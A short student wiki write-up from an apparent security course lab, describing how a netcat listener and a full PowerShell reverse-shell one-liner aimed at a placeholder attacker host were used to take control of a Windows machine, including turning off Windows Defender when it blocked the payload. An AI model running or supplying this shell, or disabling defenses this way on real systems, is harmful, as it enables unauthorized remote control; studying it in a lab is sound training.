Reverse Shells - Robertsegee/SEC335 GitHub Wiki

In this lab we used reverse shells to break into a windows system. The first step was to run the command nc -nlv -p 4449. What this would do is have our machine listen for port 4449 to see if we could connect to it. Then on the target we would run the following command:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKERIP',ATTACKERPORT); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
This would then allow us to connect to the windows machine, however, there was one other issue that came with it. The issue in question is that windows defender prevented us from joining because it labeled it as malicious. To fix this I disabled windows defender in the settings, after that was done I then was able to successfully get into the machine.